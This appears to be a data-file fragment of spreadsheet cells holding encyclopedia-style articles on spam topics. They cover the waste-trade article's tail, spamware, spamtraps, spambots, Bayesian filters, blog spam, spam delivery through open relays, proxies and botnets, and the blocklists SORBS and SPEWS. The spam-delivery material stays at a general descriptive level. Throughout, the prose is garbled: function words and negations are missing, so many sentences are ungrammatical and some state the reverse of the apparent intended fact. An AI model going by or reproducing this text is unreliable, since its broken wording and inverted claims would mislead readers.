ovotoxicity, reproductive damage, many fatal diseases. improper disposal hazardous wastes creates fatal health problems, serious public health risk. politics april 2018, president rodrigo duterte philippines threatened declare canada failed retrieve tonnes garbages mistakenly labelled recyclable. said cargos garbages canada shipped private company recycled plastic material last 2016. duterte already known blatant comments aggressive behaviour. during asean summit hosted manila, philippines, prime minister justin trudeau attended controversially actions solve issue. trudeau promised bring back canadian garbage philippines years later compromised. duterte gave canadian government philippine government supreme court escalate international court justice. this also known philippine-canada waste war. after month, malaysia second asian nation escalate illegal garbage trading canada, japan according malaysian minister environment; made strong statement malaysians accept garbages developed countries malaysian human rights. china also restricts imports garbages developed countries asian nations thailand, indonesia, vietnam myanmar became next garbage dump developed countries unethical. international responses global waste trade issues there various international responses problems associated global waste trade multiple attempts regulate thirty years. hazardous waste trade proven difficult regulate much waste traded, laws often difficult enforce. furthermore, often large loopholes international agreements allow countries corporations dump hazardous wastes dangerous ways. notable attempt regulate hazardous waste trade basel convention. international treaties relevant trade basel convention basel convention control transboundary movements hazardous wastes their disposal, usually known basel convention, international treaty plays crucial role regulating transnational movement hazardous wastes. basel convention created 1989 attempts regulate hazardous waste trade, specifically prevent dumping hazardous waste developed countries less developed countries. basel convention developed following series high-profile cases large amounts toxic waste dumped less developed countries, poisoning people environment. convention seeks reduce creation hazardous wastes, control reduce trade across borders. convention opened signatures march 1989, officially entered force 1992. 2014, states european union parties convention. haiti united states signed convention ratified enforce environmental network optimizing regulatory compliance illegal traffic (enforce) agency staffed relevant experts promote compliance basel convention. international body created deal transboundary issues international hazardous waste trade. because issue transnational hazardous waste trade crosses many borders affects many nations, important multinational, multilateral organization presiding affairs. members enforce include representative five united nations regions parties convention well five representatives basel convention regional coordinating centers, based equitable geographical representation. members organizations united nations environmental programme (unep), international criminal police organization (interpol), ngos working prevent stop illegal traffic basel action network (ban), many organizations also eligible become members enforce. protocol liability compensation 1999 basel convention passed protocol liability compensation sought improve regulatory measures better protect people hazardous waste. protocol liability compensation attempts “assign appropriate liability procedures transboundary movements hazardous wastes result damages human health environment”. protocol “imposes strict liability damages situations involving parties basel convention, maintain control hazardous waste respective notifying, transporting, disposing entities.” seeks regulate ensure countries’ corporations’ compliance basel convention laws. however, protocol remains unsigned countries, applicability limited. lomé convention cotonou agreement effort protect unfair hazardous waste dumping, african, caribbean, pacific states (acp) signed lome convention, supplement basel convention prohibits “export hazardous wastes european community states.” this convention attempt developing countries protect western countries exporting waste poorer nations hazardous waste trade. when lomé convention expired 2000, countries european countries entered agreement known cotonou agreement, “recognizes existence disproportionate risks developing countries desires protect inappropriate hazardous waste shipments countries.” bamako convention 1991 multiple developing nations africa discuss dissatisfaction basel convention regulating dumping hazardous waste countries, designed import hazardous wastes countries called bamako convention. bamako convention different basel convention bamako “essentially bans import hazardous waste generated outside [the organization african unity] disposal recycling deems import non-party illegal act.” however, countries could effectively implement stipulations convention could prevent dump toxic wastes limited resources lack powerful enforcement. therefore, application bamako convention limited. critiques responses laura pratt, expert hazardous waste trade, claims despite local international attempts regulate hazardous waste trade, “current international agreements, widespread, legally binding agreements agendas among smaller groups countries, successful eliminating toxic waste colonialism proponents would hoped.” explains various loopholes current system allow toxic waste continue dumped, toxic colonialism unchecked. some problems international agreements include continued illegal shipments unclear definitions terms. fraudulent shipments concealments pratt explains despite attempts regulate illegal dumping, “[o]ftentimes hazardous waste simply moved false permits, bribes, improper labels, even pretext 'recycling,' growing trend.” companies often export hazardous wastes poorer countries illegal smuggling. attempts regulate market hindered lack ability monitor trade, many countries authoritative legislative bodies place prevent punish illegal trafficking hazardous wastes. furthermore, pratt explains without coordinated international methods enforce regulations, extremely difficult countries "control illegal trade hazardous waste, disparity enforcement resources regulation uniformity.” developing nations still bear brunt illegal activity most, often resources capability protect themselves. issues legal definitions another issue basel convention international agreements regulate waste trade difficulty establishing clear, uniform definitions regarding wastes. these overly broad ambiguous definitions cause problems international agreements, different parties interpret language agreements differently thus accordingly. example, “‘lack distinction ‘waste’ ‘products’ convention vague criteria ‘hazardous’ allowed continued export 'hazardous waste’ label commodities materials, despite fact wastes still present environmental health risks developing countries.” also electronic waste global trade issues environmental dumping environmental justice environmental racism global environmental inequality pollution hypothesis pollution colonialism sacrifice zone toxic colonialism notes references sources</t>
  </si>
  <si>
    <t>Sparse binary polynomial hashing</t>
  </si>
  <si>
    <t>sparse binary polynomial hashing (sbph) generalization bayesian spam filtering match mutating phrases well single words. sbph generating large number features incoming text automatically, using statistics determine weights features terms predictive values spam/nonspam evaluation. external links paper subject relates spam (some article text comes document, gfdl)</t>
  </si>
  <si>
    <t>GnoMint</t>
  </si>
  <si>
    <t>gnomint free software tool managing x.509 certification authorities (cas). purpose offer easy interface creating certification authorities related elements including x.509 digital certificates, certificate signing requests (csrs) certificate revocation lists (crls). features gnomint following features: infrastructure needed keep certification authority saved file. it's able create certificate signing requests, allowing export pkcs#8 files, sent cas. allows creation x.509 certificates, usual subject-parameters. export certificates private keys files, used external applications. also allows export pkcs#12 structures, certificates imported easily mail clients. user establish policies certificate generation existing cas. gnomint import csrs made applications. certificates revoked, generation corresponding crls allows possibility keeping private key, private keys, external files devices drives) gnomint able manage whole hierarchy cas, simultaneously, respectives certificates. pre-existing certification authorities made applications, openssl tinyca, imported data. intended batch certificate creation, integration utilities. licence motivation gnomint licensed general public license. gnomint intended help systems network administrators deploy certification authority easily. development started lack 'just-works' software. according gnomint's author, "creating zero, open-source command-line utilities, possible, uncomfortable remember necessary parameters. create difficult configuration file." also open source implementations references "gnomintを使って独自の認証機関を設定する". sourceforge.jp japanese). 2008-10-03. retrieved 2009-08-29. "gnomint homepage". retrieved 2012-11-30. gnomint 1.0.0 announce message setting certificate authority gnomint external links official website</t>
  </si>
  <si>
    <t>Spamware</t>
  </si>
  <si>
    <t>spamware software designed spammers. spamware varies widely, include ability import thousands addresses, generate random addresses, insert fraudulent headers messages, dozens hundreds mail servers simultaneously, make open relays. being automated software create e-mail broadcasting establishing superiority numbers sending capability well brings position great disturbance target. normally, applications found various online based chat rooms like nimbuzz. sale spamware illegal eight u.s. states.another type spamware software used search e-mail addresses build lists e-mail addresses used either spamming directly sold spammers. also e-mail spam references external links spamsights.org spamware vendor list bulk mailers curlie</t>
  </si>
  <si>
    <t>Spamtrap</t>
  </si>
  <si>
    <t>spamtrap honeypot used collect spam. spamtraps usually e-mail addresses created communication, rather lure spam. order prevent legitimate email invited, e-mail address typically published location hidden view automated e-mail address harvester (used spammers) find email address, sender would encouraged send messages email address legitimate purpose. since e-mail solicited owner spamtrap e-mail address, e-mail messages sent address immediately considered unsolicited. term compound words "spam" "trap", spam analyst spamtraps catch spam trapper lays traps catch wild animals. provenance term unknown, several competing anti-spam organizations claim trademark industry uses untainted spamtrap continue collect samples unsolicited messages acted automated anti-spam system. automated system could instantly block e-mail messages content, arriving e-mail addresses, messages would considered bulk unsolicited e-mail, typical definition spam. automation considered "safe" legitimate email messages arriving spamtrap address. source address sender delivering e-mail spamtrap could also added blacklist source address blacklisting e-mail. vulnerabilities spamtrap becomes tainted third party discovers spamtrap e-mail address used for. once occurs, third party could target spamtrap maliciously sending email giving third party control automated process considered bulk unsolicited e-mail anti-spam system. however, would able subscribe spamtrap address email list list would confirmed opt-in. spammers using spamtrap addresses mailing lists sender addresses cause backscatter reply/dsn sent spamtrap address. spammer puts spamtrap mailbox address line, addresses "reply-all" forward message, cause address considered spam, too. many spamtrap addresses show search engine results, anyone write addresses without knowing mail caught spam. usenet spamtrap also usenet newsgroup whose sole purpose lure cross-posted spam. example, alt.sex.cancel newsgroup charter states article posted cancelled immediately. thus, spammer cross-posts article entire alt.sex.* hierarchy, including alt.sex.cancel, find article quickly cancelled. also project honey address munging anti-spam techniques (e-mail) botnets e-mail address harvesting list poisoning stopping e-mail abuse references</t>
  </si>
  <si>
    <t>Spamming</t>
  </si>
  <si>
    <t>Global Telecoms Exploitation</t>
  </si>
  <si>
    <t>global telecoms exploitation reportedly secret british telephonic mass surveillance programme british signals intelligence computer security agency, government communications headquarters (gchq). existence revealed along sister programme, mastering internet, june 2013 part global surveillance disclosures former national security agency contractor edward snowden. also mass surveillance united kingdom mastering internet tempora references</t>
  </si>
  <si>
    <t>Spambot</t>
  </si>
  <si>
    <t>spambot computer program designed assist sending spam. spambots usually create accounts send spam messages them. hosts website operators responded banning spammers, leading ongoing struggle spammers spammers find ways evade bans anti-spam programs, hosts counteract methods. email email spambots harvest email addresses material found internet order build mailing lists sending unsolicited email, also known spam. such spambots crawlers gather email addresses websites, newsgroups, special-interest group (sig) postings, chat-room conversations. because email addresses distinctive format, spambots easy code. number programs approaches devised foil spambots. technique address munging, email address deliberately modified human reader (and/or human-controlled browser) interpret spambots cannot. this evolution sophisticated spambots able recover email addresses character strings appear munged, instead render text browser scrape email addresses. alternative transparent techniques include displaying part email address page image, text logo shrunken normal size using inline css, text order characters jumbled, placed readable order display time using css. forums forum spambots browse internet, looking guestbooks, wikis, blogs, forums, types forms submit bogus content. these often technology bypass captchas. some spam messages targeted towards readers involve techniques target marketing even phishing, making hard tell real posts generated ones. other spam messages meant read humans, instead posted increase number links particular website, boost search engine ranking. prevent spambots creating automated posts require poster confirm intention post email. since spambot scripts fake email address posting, email confirmation request unlikely successfully routed them. some spambots pass step providing valid email address validation, mostly webmail services. using methods security questions also proven effective curbing posts generated spambots, usually unable answer upon registering, also various forums, consistent uploading spam also gain person title 'spambot'. twitter twitterbot program used produce automated posts twitter microblogging service, automatically follow twitter users. twitterbots come various forms. example, many serve spam, enticing clicks promotional links. others post @replies automatically "retweet" response tweets include certain word phrase. these automatic tweets often seen funny silly. some twitter users even program twitterbots assist scheduling reminders. also anti-spam techniques botnet list poisoning rustock botnet spamtrap spider trap votebots references external links botnet discussion mailing list harvester killer fight back spambots fight spam join byteplant's spambot honeypot project botscout: anti-bot service dedicated fighting forum spam spambot beware! information avoid, detect, harass spambots bot-trap web-robot blocker</t>
  </si>
  <si>
    <t>SpamBayes</t>
  </si>
  <si>
    <t>spambayes bayesian spam filter written python uses techniques laid paul graham essay plan spam". subsequently improved gary robinson peters, among others. notable difference conventional bayesian filter filter used spambayes three classifications rather two: spam, non-spam (called spambayes), unsure. user trains message either spam; filtering message, spam filters generate score another spam. spam score high score low, message classified spam. spam score score high, message classified ham. scores high low, message classified unsure. this approach leads number false positives false negatives, result number unsures need human decision. filtering some work gone applying spambayes filter internet content proxy server. references external links official website paul graham's original idea essay discussing improvements graham's original idea explaining spambayes works paper spambayes conference e-mail anti-spam winning spam: comparison bayesian spam filters</t>
  </si>
  <si>
    <t>Spam reporting</t>
  </si>
  <si>
    <t>spam reporting, properly called abuse reporting, action designating electronic messages abusive reporting authority (e.g. email administrator) dealt with. reported messages email messages, blog comments, kind spam. flagging user generated content sites abuse reports particular kind feedback whereby users flag users' posts abusive content. most sites allow user-generated content either apply sort moderation based abuse reports, hiding deleting offending content defined threshold, implement variety user roles allow users govern site's contents cooperatively. email spam reporting spammers' behavior ranges somehow forcing users cooperatively offering possibility out, wildly hiding sender's identity (including phishing). intractable cases dealt reporting abusive message hash-sharing systems like, example, vipul's razor benefit victims. cases, cooperative component sender side spam reports mitigate problem origin; example, detect botnets, educate sender, simply unsubscribe report's originator. email spam legislation varies country, forbidding abusive behavior extent, cases worth prosecuting spammers claiming damages. 6650 recommends recipients abusive messages report mailbox providers. provider's abuse-team determine best course action, possibly considering hash-sharing legal steps. sender subscribed feedback loop (fbl), mailbox provider forward complaint feedback report according existing agreement. otherwise, mailbox providers determine responsible abuse forward complaint them. those recipients unsolicited abuse reports actually prospect subscribers, inasmuch mailbox provider needs offer means manage report stream. hand, mailbox providers prevent messages non-cooperative senders abusive content.abuse reports sent email using abuse reporting format (arf), except initial notification recipient cases mailbox implementation provides direct means. target address abuse report depends authority abusive message going reported choices include following: public reporting hub, global reputation tracker, spamcop abusix's blackhole.mx. different degrees skill required properly interact different hubs. domain-specific reporting recommended choice users. provided, accessible visible button menu item mail client. feedback loop subscriber selected target mailbox provider receiving end-user report. users aware provider's policy. abuse authenticated domain handled reported message. domainkeys identified mail (dkim) usual authentication protocol, sender policy framework (spf) used way. mailbox provider choice. abuse address last relay. some skill required properly locate data. this default choice mailbox provider whose server received abusive message (before recipient reported annotated relevant address. there various sites maintain databases, network abuse clearinghouse name), abusix address (number)), more. there also hierarchy delegations relevant regional internet registry (rir), corresponding whois record include poc, either remark specific database object, e.g. incident response team.the first three methods provide full email addresses send reports otherwise, target abuse mailboxes assumed form defined 2142 (abuse@example.com), determined querying either rir's whois databases—which query result limits— databases created specifically purpose. there tendency mandate publication exact abuse pocs.abused receivers automate spam reporting different degrees: push button message, tool automatically quarantines reports messages recognizes spam. when specific tools available, receivers report abuse hand; forward spammy message attachment—so include whole header—and send chosen authority. mailbox providers also tools automatically process incidents notifications. also abuse reporting format feedback loop (email) references</t>
  </si>
  <si>
    <t>Spam poetry</t>
  </si>
  <si>
    <t>spam poetry, sometimes called spoetry, poetic verse composed primarily subject lines content spam e-mail messages. history several writers claimed created spam poetry, consensus emerged single origin. some early examples come spam poetry competition held 2000 website satire wire. canadian poet read began writing sending spam poems group 'subscribers' daily treated spam email series september, 2003. selection first years published spam, poams: selected daily treated spam 2005 bookthug. daily treated spam continued 2011, series, subtitled spamdemic, began august 2020. animator hertzfeldt began writing spam poems production journal 2004. translator jorge candeias wrote portuguese "spoems" daily, 2003 2004, using spam subject lines title inspiration.a book entitled machine language endwar published 2005 izen followed machine language, version also endwar 2006. latter edition includes spoetry read microsoft ambient musical sounds michael truman also tweaked automated readings. each edition indicates endwar editor, second edition admitted using cut-up technique combined shorter pieces first edition, lends authorship creation. these pieces also read opening blends bridges, concrete visual poetry show gallery cleveland, ohio, april 2006, endwar sounds truman backing. experimental poet, endwar, cites collaboration ficus strangulensis, experimental poet, 1995, further last words dutch schultz published izen earlier experiment generating random text poetry, case, software altered text bizarre last words dutch schultz published york times 1935, well cut-up influences brion gysin william burroughs even musicians throbbing gristle david bowie. useful bits spam purposes endwar's variation spoetry, i.e., part advertisement, random words assigned trick spam filters, endwar calls "paratext". endwar indicates that, view, "the effect evolution paratext computers learning talk sense imitating human texts." advertisements human-to-human conversation email sources. book entitled 'spam: e-mail inspired poems' myers published 2008 blackheath books myers claims writing spam poems since 1999. creation spoetry similar gysin burroughs's cut-up technique individual subject lines messages pieced together poetic form; making creation spoetry exercise creativity much unexpected. result crafted literary form author desires: haiku, concrete poetry, limerick, dada, thus, spoetry literary form rather means creating poetry. related concept spam lit, snippets nonsensical verse prose embedded spam e-mail messages. some snippets original content, others passages conglomerations public-domain works. term coined member poetics listserv 2002. august 2006, david kestenbaum npr's morning edition broadcast story "literary spam". kestenbaum notes paul graham, programmer, "wrote program find best separate spam real e-mail. train good helping spam separate sample real e-mail." soon, spammers discovered works long-dead poets writers circumvent graham's anti-spam code. also flarf poetry references external links article published 2003 harvard business school newspaper article published 2003 news article published 2004 (australia) article published 2006 guardian (united kingdom) anthology spam poetry spam poetry myers' spam poetry review myers' spam poetry book journal entries july 2004 april 2004 hertzfeldt “spam day” flak magazine’s splog kristin thomas' spam poetry spoetry site site featuring dynamically generated rhyming couplets article samples published 2007 guardian review 'the spam anthology' published 2007 3:am magazine 'the poetry spam' september 2006, arts andrew gallix guardian history spam lit, july 2008 poems extracted spam style e.e. cummings</t>
  </si>
  <si>
    <t>Spam mass</t>
  </si>
  <si>
    <t>spam mass defined "the measure impact link spamming page's ranking." concept developed zoltán gyöngyi hector garcia-molina stanford university association pavel berkhin pedersen yahoo!. this paper expands upon proposed trustrank methodology. researchers developed good core core selected documents measured spam mass across collection documents. types measurements, absolute mass relative mass, used compare groups documents. higher mass measurements, likely documents equivalent spam. thresholds threshold value used identify groups documents spam. relative mass value exceeds threshold, documents considered spam. second threshold pagerank values selected documents applied. only high pagerank documents labelled spam. purpose methodology identify spam documents artificially inflated pagerank values. external links "link spam detection based mass estimation" (pdf).</t>
  </si>
  <si>
    <t>Spam in blogs</t>
  </si>
  <si>
    <t>spam blogs (also called blog spam, comment spam, social spam) form spamdexing. (note blog spam also another meaning, specifically blog author creates posts without adding informational educational value solely publishing websites) posting random comments blog websites (usually automated process) copying websites' content using free-to-use publishing services like blogger wordpress publicly accessible wikis, digital guest books, internet forums. posts comments, spammers methods artificially inflate website ranking linking back (also called backlink) pages. backlink help search algorithms determine popularity page, contributes major role search engines like google microsoft bing decide page ranking certain search query. normally, page backlinks considered valuable. this helps spammer's website list ahead sites certain searches, help increase number visitors website. history this type spam originally appeared internet guestbooks, spammers repeatedly filled guestbook links sites irrelevant comments, increase search engine rankings. actual comment given often "cool page", "nice website", keywords spammed link. 2003, spammers began take advantage open nature comments blogging software like movable type repeatedly placing comments various blog posts provided nothing link spammer's commercial site. allen created free plugin, called mt-blacklist, movable type weblog tool (versions prior 3.2) attempted alleviate problem. many blogging packages methods preventing reducing effect blog spam built prevalence, although spammers developed tools circumvent them. many spammers special blog spamming tools like trackback submitter bypass comment spam protection popular blogging systems like movable type, wordpress, others. other phrases typically used comment content copied comments websites, "nice article", plagiarized parts books, unfinished sentences, nonsense words (usually defeat minimum comment length restriction) link repeated. application-specific implementations particularly popular software products movable type mediawiki developed included anti-spam measures, spammers focus targeting platforms prevalence internet. whitelists blacklists prevent certain posting, prevent people posting content matches certain filters, common defenses although softwares tend combination variety different techniques documented below. goal every potential solution allow legitimate users continue posting comments (and often even links comments, considered valuable aspect comments section, links relevant related article content) whilst preventing spam links irrelevant comments viewable site's owner visitors. also social spam unwanted spam content appearing social networking services references external links project honeypot directory content spammers gilad mishne, david carmel ronny lempel: blocking blog spam language model disagreement, pdf. from first international workshop adversarial information retrieval (airweb'05) chiba, japan, 2005.</t>
  </si>
  <si>
    <t>Spam email delivery</t>
  </si>
  <si>
    <t>since internet users system administrators deployed vast array techniques block, filter, otherwise banish spam users' mailboxes almost internet service providers forbid services send spam operate spam-support services, special techniques employed deliver spam emails. both commercial firms volunteers subscriber services dedicated blocking filtering spam. webmail common practice spammers create accounts free web-mail services, hotmail, send spam receive e-mailed responses potential customers. because amount mail sent spammers, require several e-mail accounts, bots automate creation accounts. effort abuse, many services adopted system called captcha: users attempting create account presented graphic word, uses strange font, difficult read background. humans able read graphics, required enter word complete application account, computers unable accurate readings words using standard techniques. blind users captchas typically audio sample. spammers have, however, found means circumventing measure. reportedly, sites offering free pornography: access site, user displays graphic webmail sites, must enter word. spammers equip pornography-carrying emails (and email type general) enter searches search engine larger number windows opened. example, simply inputting word "porn" google's search engine, spam messages open several sites related word "porn." these messages make hard trace spammer search word(s) make appear spam receiver entered word themselves. search word appear recent searches windows appear history page unless link clicked site. some porn-emails link specific sites user create account enter payment information. once user successfully created account, user gains access pornographic material. furthermore, standard image processing techniques work well many captchas. third-party computers early spammers discovered sent large quantities spam directly accounts, recipients would complain isp's would shut accounts down. thus, basic techniques sending spam become send someone else's computer network connection. this, spammers protect several ways: hide tracks, others' systems work delivering messages, direct efforts investigators towards systems rather spammers themselves. spammers equip messages selected searches search engines (i.e. google) open greater amount search windows. long server's computer open range windows increase. increasing broadband usage gave rise great number computers online long turned whose owners always take steps protect malware. botnet consisting several hundred compromised machines effortlessly churn millions messages day. this also complicates tracing spammers. open relays 1990s, common spammers open mail relays. open relay mta, mail server, configured pass along messages sent location, recipient. original smtp mail architecture, default behavior: user could send mail practically mail server, would pass along towards intended recipient's mail server.the standard written spamming hosts internet, internet abide certain level conduct. while cooperative, open approach useful ensuring mail delivered, vulnerable abuse spammers. spammers could forward batches spam open relays, leaving delivering messages relays. response, mail system administrators concerned spam began demand mail operators configure mtas cease open relays. first dnsbls, maps now-defunct orbs, aimed chiefly allowing mail sites refuse mail known open relays. 2003 less corporate mail servers available open relays, 1997. open proxies within years, open relays became rare spammers resorted tactics, prominently open proxies. proxy network service making indirect connections network services. client connects proxy instructs connect server. server perceives incoming connection proxy, original client. proxies many purposes, including web-page caching, protection privacy, filtering content, selectively bypassing firewalls.an open proxy create connections client server, without authentication. like open relays, open proxies relatively common, many administrators need restrict access them. spammer direct open proxy connect mail server, send spam mail server logs connection proxy—not spammer's computer. this provides even greater degree concealment spammer open relay, since relays client address headers messages pass. open proxies also used conceal sources attacks services besides mail, sites servers. spam proxies "spammable" resources grew, dnsbl operators started listing addresses, well open relays. scripts besides relays proxies, spammers used insecure services send spam. example formmail.pl, script allow web-site users send e-mail feedback html form. several versions program, others like allowed user redirect e-mail arbitrary addresses. spam sent open formmail scripts frequently marked program's characteristic opening line: "below result feedback form." ‘tell friend page’ features websites offer vulnerable design allow visitor message email sent. consequently, scripts often abused send spam, particularly so-called scams. spammer viruses 2003, spam investigators radical change spammers sent spam. rather searching global network exploitable services open relays proxies, spammers began creating "services" own. commissioning computer viruses designed deploy proxies spam-sending tools, spammers could harness hundreds thousands end-user computers. widespread change windows windows many home computers, started early 2002 well 2003, greatly accelerated home computers remotely controlled spam proxies. original version windows well xp-sp1 several major vulnerabilities allowed machines compromised network connection without requiring actions part user owner.most major windows e-mail viruses 2003, including sobig mimail virus families, functioned spammer viruses: viruses designed expressly make infected computers available spamming tools.besides sending spam, spammer viruses serve spammers ways. beginning july 2003, spammers started using viruses perpetrate distributed denial-of-service (ddos) attacks upon dnsbls anti-spam resources. although means first time illegal attacks used anti-spam sites, perhaps first wave effective attacks. august year, engineering company osirusoft ceased providing dnsbl mirrors spews blocklists, several days unceasing attack virus-infected hosts. next month, dnsbl operator monkeys.com succumbed attacks well. other dnsbl operators, spamhaus, deployed global mirroring anti-ddos methods resist attacks. zombie networks particularly active north america half internet users broadband connection many leave computers time. january, 2008, e-mail spam sent storm botnet, created storm worm, first released january, 2007. estimated many million computers infected owners unwilling unknowing participants. quarter 2008 almost every email messages contained dangerous attachment, designed infect recipient's computer, eight times often previous quarter. references</t>
  </si>
  <si>
    <t>Spam and Open Relay Blocking System</t>
  </si>
  <si>
    <t>sorbs ("spam open relay blocking system") list e-mail servers suspected sending relaying spam blackhole list). augmented complementary lists include various classes hosts, allowing customized email rejection users. history sorbs dnsbl project created november 2001. maintained private list january 2002 dnsbl officially launched public. list consisted 78,000 proxy relays rapidly grew 3,000,000 alleged compromised spam relays.in november 2009 sorbs acquired software, enhance mail filtering solutions.in july 2011 sorbs re-sold proofpoint, inc. duhl sorbs adds ranges belong dialup modem pools, dynamically allocated wireless, connections well dhcp ranges using reverse records, whois records, sometimes submission isps themselves. this called duhl dynamic user host list. sorbs automatically rescan duhl listed hosts updated rdns remove address duhl user request delisting rescan. blocks scanned region listings scan includes listed netspace, sorbs automatically removes netspace marked static. matthew sullivan sorbs proposed internet draft generic reverse addresses include purposing tokens static dynamic, abbreviations thereof, more. that naming scheme would allowed users classify addresses without need rely third party lists, sorbs duhl. internet draft since expired. generally considered appropriate isps simply block outgoing traffic port wish prevent users sending email directly, rather specifying reverse record ip.sorbs' dynamic list originally came dynablock developed independently since dynablock stopped updating december 2003. spam traps addresses send spam sorbs spamtraps added spam database automatically manually. order prevent blacklisted, major free email services gmail, yahoo, hotmail, well major isps implement outgoing anti-spam countermeasures. gmail, example, continues listed delisted refuse abuse reports. however, smaller networks still unwittingly blocked. because spammers viruses, malware, rootkits force compromised computers send spam, sorbs lists addresses servers infected system uses send spam. because this, larger isps corporate networks started blocking port order prevent compromised computers able send email except designated email servers. preemptive listings sorbs maintains list networks addresses believes assigned dynamically users/machines, refers list duhl (dynamic user/host list). list includes wide networks computers sharing address using network address translation also affected computer behind allowed send spam, whole network blacklisted ever blacklisted.) this common method pre-emptive blocking legitimate mail servers hosted data centers designed provisioned services, legitimate mail servers affected listings commonly home hobbyists running mail servers. spamhaus policy block list (pbl) another pre-emptive list list dynamic hosts, also blocks hosts believes sending email directly third-party servers. sorbs also operate another list similar spamhaus called noservers list, wholly maintained network administrators respective networks therefore theoretically false positive free. escalated listings sorbs accused deliberately targeting innocent users escalated listings. website describes process follows: escalated listing hand whole network addresses listed sorbs hosts (whether assigned single customer multiple) listed therefore blocked result spam folder issues. sorbs create escalated listings? simple answer stop spam. ask, 'how listing innocent help stop spam?' simple, providers don’t care spam." there many heated discussions practice often would appear email users caught trap recourse, listing applies block addresses, unable release address. false positives automation sorbs listings possible addresses legitimate mail servers listed time time. therefore, users sorbs spam list particular consider carefully implications wish service part larger spam blocking system. sorbs servers' list reported wholly administered network administrators networks concerned therefore false positive free. statistics sorbs produces publishes daily statistics list otherwise defunct usenet newsgroup news.admin.net-abuse.bulletins (nanab). april 2021 statistics published show following listing totals: unique proxy entries: 613259 unique relay entries: 7824 unique spam entries: 48515896 unique hacked entries: 7337019 unique duhl entries: 381194921 unique exduhl entries: 1072776 unique cable entries: 3877257 unique zombie entries: 1772805 unique adminrequested entries: unique unallocated entries: 139101 unique colo entries: 136259 unique mailserver entries: unique spammer entries: unique escalated entries: 2305 unique phishing entries: 110995 unique virus entries: 5630114 unique backscatter entries: unique business entries: 5693190 unique static entries: 8906441 unique whitehat entries: unique noservers entries: 46844194 unique corenetwork entries: 42588 unique instantreport entries: unique emailreport entries: unique permission entries: unique botnet entries: 379527 total listed database 512276654 also comparison blacklists references external links official website open relay online tester</t>
  </si>
  <si>
    <t>Spam Prevention Early Warning System</t>
  </si>
  <si>
    <t>spam prevention early warning system (spews) anonymous service maintained list address ranges belonging internet service providers (isps) host spammers show little action prevent abuse networks' resources. could used internet sites additional source information senders unsolicited bulk email, better known spam. spews longer active. successor, anonymous postmaster early warning system (apews), appeared january 2007. overview spews published large text file containing listings, operated database users could query reasons listing. users spews could access data software dnsbl anti-spam techniques. instance, many mail sites used spews data provided spews.relays.osirusoft.com. dnsbls hosted osirusoft shut august 2003 several weeks denial service attacks. number mirrors existed based spews data, remained accessible public. sorbs, example, provided mirror spews data early 2007. there certain degree controversy regarding spews' anonymity methods. remaining anonymous, spews admins presumably wanted avoid harassment lawsuits sort hampered anti-spam services maps orbs. some clients whose providers listed spews took umbrage addresses associated spamming, mail might blocked users spews data; often understand provider listed. sometimes, solution leave blacklisted provider, spews willing holes listing clean user otherwise dirty block. there either customer provider contact spews, spews claimed listings would removed associated abuse stopped. spews database updated since august 2006; dnsbl.com lists status dead. since spews became inactive, anonymous postmaster early warning system (apews) taken place, using similar listing criteria nearly identical page. process precise process spews gathered data spam sources unknown public, likely operators used multiple techniques. spews seemed collect information honeypots—mail servers single email addresses legitimate mail received. these dummy addresses never sent email (and therefore could requested subscribed legitimate mailing list). they also placed bait header usenet post page, spammer might discover choose spam them. spews website made clear spam received, operators filed complaint site responsible spam source. only spam continued complaint source listed. however, spews anonymous—when complaints sent, marked spews, site told ignoring complaint would result listing. this effect determining isp's response normal user's spam complaint, also discouraged listwashing—continuing spam, complaining address removed target list. spam stop time, spews increased size address range listed process referred "escalation". this process repeated, conceivably entire netblock owned offending service provider listed block large enough service provider encouraged take action complaints paying customers. criteria listing spews criteria based "spam support"; network operation provided services identified spammers, resources involved listed. instance, part isp's network listed spews providing service domain mentioned piece e-mail spam, even messages sent said provider's mail servers. listing data evidence files addresses listed spews mentioned "evidence files". these plain text files, appeared edited hand, addresses along technical evidence backing listing, shown. contents evidence files might seem rather cryptic readers intimately familiar technical jargon internet. criticism spews knows many service providers used spews list reject mail. contacting spews common criticism contact spews. according spews faq: "q41: contact spews? a41: not..." having contact spews seen spews avoid deal complaints—even legitimate—and immune many consequences mistakes, policies, problems. this caused spews listed dnsbls formerly maintained rfc-ignorant.a countervailing view spews adopted policy response vexatious litigation against, e.g. maps rbl. there nothing spews site indicate care legitimate issues, want deal specious complaints spammers. criticism spews critics claimed blocked sites reasons considered unfair. they argued ordinary customer held responsible actions customers isp. counter argument supporters responded spews list isps spam problems. listed, customers. this often argued analogy pizza delivery companies deliver high crime areas. it's situation someone "stuck" area, supporters argue also provides encouragement good citizen unstick move without spam problem. loses revenue good gets customers, encouraging isps clean supporters spews often pointed claim spews "blocked" email sites misconception. spews listing caused mail refused recipient email isp) chose block based spews list. this counter argument criticized grounds spews spread information conducive blocking, knowledge people using block. according criticism, spews considered partly responsible blocking done could legitimately blamed blocking inappropriate. view, claims lists spews advisory spews block seen attempts evade responsibility spews's actions. delisting according spews faq, listings removed spam spam-support stopped. just solicit nominations listings, spews operators solicit requests delistings. there contact information published spews website. there spews.org mail server, operators spews receive email spews name. believed operators read certain usenet newsgroups related spam email abuse. however, poster claimed spews operator regular newsgroups claimed know identity. accounts many regulars, spews could detect automatically support stopped, supported information spews faq. also news.admin.net-abuse.email (nanae) references external links spews apews websites spews.org library congress archives (archived 2002-12-02) (last good archive. domain owned another entity.) apews.org advice others first post nanae newsgroup what listed apews (dnsbl.com) listed apews: (and definitely do!)</t>
  </si>
  <si>
    <t>Spam Bully</t>
  </si>
  <si>
    <t>spam bully anti-spam software made axaware, llc. spambully uses bayesian filtering separate good emails spam emails. spam bully included feature performed automated clicks spam mail, similar software later adnauseam browser extension. references external links official website</t>
  </si>
  <si>
    <t>SpamCop</t>
  </si>
  <si>
